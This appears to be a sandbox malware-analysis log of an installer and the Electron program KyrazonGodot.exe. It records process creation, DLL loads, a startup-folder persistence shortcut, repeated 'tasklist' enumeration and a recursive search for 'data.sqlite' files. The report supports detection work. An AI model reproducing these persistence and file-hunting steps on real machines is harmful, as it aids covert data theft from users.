Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "KyrazonGodot.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk" /T:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
